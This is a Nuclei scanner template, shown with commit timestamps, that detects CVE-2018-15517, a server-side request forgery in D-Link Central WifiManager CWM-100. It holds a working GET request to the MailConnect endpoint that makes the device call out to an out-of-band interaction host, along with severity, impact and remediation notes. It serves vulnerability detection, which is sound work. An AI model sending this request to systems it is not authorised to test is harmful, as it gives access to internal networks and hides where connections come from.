nuclei-templates/http/cves/2018/CVE-2018-15517.yaml

42 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2018-15517
info:
name: D-Link Central WifiManager - Server-Side Request Forgery
author: gy741
severity: high
description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
- http://seclists.org/fulldisclosure/2018/Nov/28
- http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
cvss-score: 8.6
cve-id: CVE-2018-15517
cwe-id: CWE-918
epss-score: 0.01001
epss-percentile: 0.83284
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: dlink
product: central_wifimanager
2024-01-14 09:21:50 +00:00
tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast
http:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950